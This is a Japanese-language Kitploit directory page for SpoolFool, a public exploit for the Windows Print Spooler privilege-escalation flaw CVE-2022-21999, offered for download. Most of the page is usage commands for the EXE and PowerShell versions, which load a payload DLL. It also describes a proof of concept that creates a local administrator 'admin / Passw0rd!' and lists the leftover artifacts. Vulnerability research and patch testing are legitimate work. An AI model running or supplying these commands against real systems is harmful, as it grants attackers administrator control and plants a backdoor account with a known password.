Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SpoolFool — CVE-2022-21999 のエクスプロイト - Windows Print Spooler Elevation of Privilege Vulnerability (LPE) | Kitploit
ツール/GitHubGitHub/ly4k/spoolfool
特権昇格脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubly4k/spoolfool

SpoolFool

CVE-2022-21999 のエクスプロイト - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

リポジトリを見る
796160514年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

SpoolFool

CVE-2022-21999 のエクスプロイト - Windows プリントスプーラーの特権昇格の脆弱性 (LPE)

詳細

提供されているエクスプロイトは、デフォルトですべての Windows デスクトップバージョンで動作するはずです。

技術的な詳細については、こちらのブログ記事をご参照ください。

使用方法

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

PowerShell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

概念実証

以下の PoC は、新しいローカル管理者 admin / Passw0rd! を作成する DLL を使用しています。DLL (AddUser.dll) とソースコードはこのリポジトリにあります。

2回目の実行

以下の PoC は、提供されたエクスプロイトの2回目の実行を示しています。今回は DLL を読み込むために脆弱性が悪用されていないことに注意してください。

アーティファクト

エクスプロイトの実行後、後片付けのために以下のアーティファクトが残されます。

  • 作成されたプリンタードライバーディレクトリは削除されません
  • ペイロード DLL はプリンタードライバーディレクトリにコピーされ、削除されません
  • 作成されたプリンターは削除されません
  • 対象のプリンターの SpoolDirectory 値は復元されません

著者

  • Oliver Lyak @ly4k_

参考文献

  • SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)
ツールをダウンロード